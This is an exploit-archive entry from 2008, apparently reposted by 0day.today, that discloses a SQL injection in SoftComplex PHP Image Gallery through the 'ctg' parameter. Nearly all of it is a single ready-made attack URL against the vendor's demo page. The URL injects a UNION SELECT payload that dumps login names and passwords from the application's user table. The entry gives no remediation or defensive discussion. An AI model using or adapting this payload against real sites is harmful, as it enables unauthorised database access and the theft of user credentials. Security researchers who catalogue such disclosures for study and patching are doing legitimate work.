id: 4101
date: 11/06/2008
title: SoftComplex PHP Image Gallery (ctg) SQL Injection Vulnerability
author: Hussin X
cves: 

===============================================================
SoftComplex PHP Image Gallery (ctg) SQL Injection Vulnerability
===============================================================


SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Velnerability
___________________________________

Author:  Hussin X
___________________________________

script    : http://www.softcomplex.com/products/php_image_gallery/demo2/

_____

ExploiT & demo
_____________

http://www.softcomplex.com/products/php_image_gallery/demo2/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show




#  0day.today [2023-03-23]  #